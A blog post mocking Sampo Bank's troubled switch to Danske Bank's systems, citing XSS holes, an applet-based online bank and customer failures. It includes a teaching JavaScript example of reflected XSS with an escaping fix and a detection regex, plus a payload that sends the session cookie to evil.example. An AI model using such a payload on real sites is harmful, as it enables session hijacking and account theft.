A bad example of introducing a new banking application

The Finnish Sampo Bank switched over to Danske Bank's information systems. The migration took over 14 months and involved more than 3,100 people. The result was rather embarrassing.

Their online customer pages have numerous XSS vulnerabilities. In practice this means that malicious content can be injected into the web page while the user still sees the bank's own domain in the URL field, so a phishing link that points at the real site is indistinguishable from a legitimate one. There are many examples floating around the internet. Here is a screenshot.
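To make the mechanism concrete, here is an added illustration of the reflected-XSS class described above. It is constructed example code written for this post, not code from Sampo Bank's or Danske Bank's site; the hostnames bank.example and evil.example, the `name` parameter and the function names are all hypothetical. The vulnerable renderer concatenates a query parameter straight into HTML; the hardened one HTML-encodes it first.

```javascript
// Added example of reflected XSS, constructed for illustration only.
// Not the bank's actual code; hostnames and parameter names are hypothetical.
// Scenario: a "welcome" page echoes the ?name= query parameter back to the user.

// Vulnerable: the parameter is concatenated straight into the markup, so a link
// such as https://bank.example/welcome?name=<script>...</script> renders
// attacker-controlled HTML on the bank's own origin (and the URL bar still
// shows bank.example).
function renderWelcomeVulnerable(name) {
  return `<h1>Welcome, ${name}</h1>`;
}

// Hardened: encode the five characters that are significant in an element
// body or a quoted attribute before the untrusted value reaches the page.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderWelcomeSafe(name) {
  return `<h1>Welcome, ${escapeHtml(name)}</h1>`;
}

// Crude check used here to show the difference: does the rendered HTML contain
// a <script> tag or an inline event handler that the template never wrote?
function containsActiveContent(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed payload of the kind a phishing link would carry: it ships the
// session cookie off to the attacker's host.
const payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>';

// Render both variants for the same attacker input.
function demo() {
  return {
    vulnerable: renderWelcomeVulnerable(payload),
    safe: renderWelcomeSafe(payload),
  };
}

console.log(demo());
```

The escaped output still shows the attacker's text on the page, but as inert characters; the fix is output encoding at the point where the value enters HTML, not input filtering at the form, which is the mistake that usually leaves a site with "numerous" XSS holes rather than one.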

The online banking is implemented with a Java applet and some native code. The purpose of the native code is unknown, but curious minds have already analyzed the applet. Here is one wiki page.

Because there are other problems with their banking systems as well, online banking has been working badly and customers have experienced bizarre issues: balances not matching reality, some functionality unavailable, and even ordinary ATM withdrawals failing for some Sampo customers. The latest and also fairly severe problem happened to a poor customer whose mortgage payment was taken twice.

No wonder Sampo-Danske Bank customers are angry and switching banks. As soon as the system is back online, that is.
